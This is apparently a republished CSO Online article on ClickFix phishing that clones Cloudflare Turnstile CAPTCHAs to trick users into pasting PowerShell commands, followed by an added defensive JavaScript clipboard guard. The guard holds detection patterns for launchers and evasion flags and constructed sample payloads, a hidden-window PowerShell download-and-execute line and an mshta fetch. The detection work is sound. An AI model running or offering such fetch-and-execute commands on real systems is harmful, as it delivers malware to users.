A new wave of browser-based phishing tricks unsuspecting users into copy-pasting malicious commands into their systems, all while believing they’re completing a legitimate CAPTCHA verification.
According to SlashNext research, attackers have been cloning the interface of Cloudflare Turnstile, a privacy-preserving CAPTCHA alternative that checks whether a visitor is human, to lure users into executing malware.
Commenting on why this is an absolute winner for the threat actors, Lionel Litty, chief security architect at Menlo Security, said, “These social engineering attacks are often successful because they astutely tap into users’ frustration: having to solve yet another CAPTCHA.” They then go on to provide instructions that are both obscure for many users and easy to follow, Litty added.
In SlashNext's observations, victims were presented with a fake security check carrying real-looking branding and a Ray ID, the per-request identifier Cloudflare shows on its own challenge pages. After clicking "Verify you are human," users are guided through key presses that, without their knowledge, paste and run a PowerShell command the page has silently placed on their clipboard.
These ClickFix campaigns, including the one impersonating the Turnstile CAPTCHA, have delivered a range of payloads, from information stealers such as Lumma and Stealc to full-fledged remote access trojans (RATs) like NetSupport Manager, which hand the attacker control of the whole system.
Fake CAPTCHA used as new phishing frontier
SlashNext researcher Daniel Kelley warned that the campaign signals a shift by threat actors from traditional phishing, which directly prompts the victim to download a file, to a more sophisticated ClickFix attack that passes itself off as a legitimate security check.
The attack begins on compromised websites into which malicious JavaScript has been injected. When users interact with these sites, they are redirected to deceptive pages that display error messages or CAPTCHA verifications and urge them to copy and paste commands into their system's terminal or PowerShell.
“When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure - Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. A pop-up or on-page message then walks the user through a sequence of key presses: Win+R to open the Run dialog, Ctrl+V to paste the command the page has already copied to the clipboard, and Enter to execute it, at which point the malware runs on their machine. Because the command is launched through the Run dialog, Windows records it in the user's RunMRU registry key, which is one of the first places an investigator should look when a ClickFix infection is suspected.
“The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.”
As defences have improved at blocking phishing email attachments that launch malicious code, threat actors have adapted their techniques, too, finding more creative ways to manipulate users into executing code themselves, Maude noted.
Exploiting ‘verification fatigue’
SlashNext highlighted that the campaign’s success stems largely from its exploitation of human psychology.
“Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” Kelley added. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”
The absence of immediate red flags such as a file download, combined with a design that borrows trusted branding and interface elements, gives victims a false sense of security.
“We have seen an increasing number of this type of attack over the past several months and have had multiple customers inquire about possible ways to hinder the attack,” Litty said. “Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks.”
Litty noted a need for browser-specific defences, including browser isolation tools, that can detect a website writing content to the clipboard and flag it to the user.
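An added example of the clipboard-write check Litty describes, applied to the copy-paste chain laid out earlier in the article (the page copies a command, the victim pastes it into Win+R). This is the editor's own illustration, not code from SlashNext, Menlo Security, Cloudflare or CSO Online; the scoring heuristics, the hook points (navigator.clipboard.writeText and document.execCommand('copy')) and the sample payload are assumptions constructed for the example, and the fake navigator and document objects stand in for the browser so the script runs under Node:

```javascript
// Added example (editor's code, not from SlashNext, CSO Online or Cloudflare):
// a page-side clipboard guard that scores any text a site pushes into the
// clipboard before it lands, which is the observable step in a ClickFix chain.
// The patterns below are this example's own heuristics, not a published rule.

// Binaries a pasted Win+R / terminal one-liner typically starts with.
const LAUNCHER = /\b(powershell(\.exe)?|pwsh|cmd(\.exe)?|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|msiexec|curl|wget|bash)\b/i;
// Flags and cmdlets used to hide the window, dodge policy or run encoded code.
const EVASION = /(^|[\s"';(])(-e(nc(odedcommand)?)?|-w(indowstyle)?\s+hidden|-nop|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass|iex|invoke-expression|downloadstring|frombase64string)\b/i;
// Something to fetch: a URL or a bare IPv4 address.
const REMOTE = /https?:\/\/|\b\d{1,3}(\.\d{1,3}){3}\b/i;
// A long base64 blob, the usual carrier for -EncodedCommand payloads.
const BASE64 = /[A-Za-z0-9+/]{60,}={0,2}/;
// Trailing decoy such as  # "I am not a robot - Verification ID: 1234"  so the
// Run box looks like a CAPTCHA step (a commonly reported trait, assumed here).
const DECOY = /#\s*["']?[^\n]*(captcha|verif|robot)/i;

function classifyClipboardText(text) {
  const reasons = [];
  if (LAUNCHER.test(text)) reasons.push('launcher');
  if (EVASION.test(text)) reasons.push('evasion flag');
  if (REMOTE.test(text)) reasons.push('remote fetch');
  if (BASE64.test(text)) reasons.push('base64 blob');
  if (DECOY.test(text)) reasons.push('decoy comment');
  // A URL on its own is ordinary; a launcher plus any second signal is not.
  const suspicious = reasons.includes('launcher') && reasons.length >= 2;
  return { suspicious, reasons };
}

// Wrap the two common clipboard-write paths; returns a live log of every write seen.
function installClipboardGuard(nav, doc, onFlag) {
  const events = [];
  const inspect = (source, text) => {
    const verdict = classifyClipboardText(text);
    const event = { source, ...verdict, preview: text.slice(0, 80) };
    events.push(event);
    if (event.suspicious && onFlag) onFlag(event);
    return event.suspicious;
  };

  if (nav?.clipboard?.writeText) {
    const original = nav.clipboard.writeText.bind(nav.clipboard);
    nav.clipboard.writeText = (text) =>
      inspect('navigator.clipboard.writeText', String(text))
        ? Promise.reject(new Error('clipboard write blocked by guard'))
        : original(text);
  }

  if (doc?.execCommand) {
    const original = doc.execCommand.bind(doc);
    doc.execCommand = (command, ...rest) => {
      // execCommand('copy') copies the current selection, which ClickFix pages
      // set by selecting a hidden textarea that holds the command.
      if (String(command).toLowerCase() === 'copy' &&
          inspect('document.execCommand(copy)', String(doc.getSelection?.() ?? ''))) {
        return false;
      }
      return original(command, ...rest);
    };
  }
  return events;
}

// Constructed stand-ins for the browser objects so this runs under Node.
function makeFakeBrowser() {
  const nav = { clipboard: { last: null, writeText(t) { this.last = t; return Promise.resolve(); } } };
  const doc = { selection: '', getSelection() { return this.selection; }, execCommand() { return true; } };
  return { nav, doc };
}

function runDemo() {
  const { nav, doc } = makeFakeBrowser();
  const flagged = [];
  const log = installClipboardGuard(nav, doc, (e) => flagged.push(e));

  // Constructed ClickFix-style payload (example.invalid is a reserved, unroutable name).
  const payload = 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/c)" # "I am not a robot - Verification ID: 1234"';
  nav.clipboard.writeText(payload).catch(() => {}); // blocked; nav.clipboard.last stays null
  nav.clipboard.writeText('https://example.com/docs'); // an ordinary copy goes through
  doc.selection = 'mshta https://example.invalid/v.hta';
  doc.execCommand('copy');                             // blocked on the execCommand path too
  return { log, flagged, delivered: nav.clipboard.last };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

In a real deployment this logic would ship as a browser-extension content script or be enforced by an isolation proxy, and there it would also have to cover the third clipboard path, a copy event handler calling clipboardData.setData, as well as writes from cross-origin iframes. The scoring is deliberately conservative: a bare URL or a git clone line passes, while a launcher combined with a second signal is blocked, which by design also catches curl-piped-to-bash installers.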
ClickFix tactics aren’t new and have been adopted in recent years by nation-state actors, most notably in the “Contagious Interview” campaign attributed to North Korean state-backed groups. The North Korea-aligned Kimsuky group has also used the technique, as have MuddyWater (Iran), and APT28 and UNK_RemoteRogue (Russia).
Originally published by CSO Online as “New phishing campaign hijacks clipboard via fake CAPTCHA for malware delivery”.